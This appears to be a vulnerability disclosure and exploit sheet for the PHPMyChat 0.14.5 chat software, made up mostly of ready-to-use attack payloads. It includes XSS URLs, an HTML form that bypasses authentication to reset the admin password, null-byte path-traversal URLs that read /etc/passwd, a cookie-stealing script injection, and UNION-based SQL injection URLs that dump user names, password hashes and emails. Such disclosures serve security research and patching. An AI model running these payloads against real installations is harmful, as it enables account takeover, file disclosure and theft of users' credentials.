PHPMyChat 0.14.5
-------------------------------------

http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>
http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>

-------------------------------------

1) For an unauthorized login it is enough to send just one additional variable: do_not_login="false"

Example:

<HTML>
<HEAD>
<TITLE>phpMyChat exploit</TITLE>
</HEAD>
<BODY>
<FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
<INPUT type="hidden" name="FORM_SEND" value="1">
<INPUT type="hidden" name="AUTH_USERNAME" value="admin">
<INPUT type="hidden" name="AUTH_PASSWORD" value="null">
<!-- INSERT -->
<INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT -->
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
<INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
<INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
<INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
<INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
<INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
<INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
<INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
<INPUT TYPE="text" NAME="EMAIL" VALUE="[email protected]">
<INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
<INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
</FORM>
</BODY>
</HTML>

2) To read files one needs administrator rights (see above for how to get them)! The variables "sheet" and "What" are not filtered:

require("./admin/admin${sheet}.php3");

and

if (isset($What) && $What != "") include("./admin/admin".$What.".php3");

Example:

http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOUR PASSWORD HASH]&sheet=[FILE]%00
http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOUR PASSWORD HASH]&sheet=/../../../../../../etc/passwd%00

and

http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOUR PASSWORD HASH]&sheet=1
http://[TARGET]/chat/admin.php3?Fro.../../../etc/passwd &L=russian&user=admin&pswd=[YOUR PASSWORD HASH]&sheet=1

3) Cross-Site Scripting aka XSS

In the input.php3 form there is a variable "C", in which the colour of messages is passed.

Example:

<INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">

Code:

"> <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \"">

4) A great number of variables are not filtered: $sortBy, $sortOrder, $startReg, $U, $LastCheck and more ...

Example SQL injection:

http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL]
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*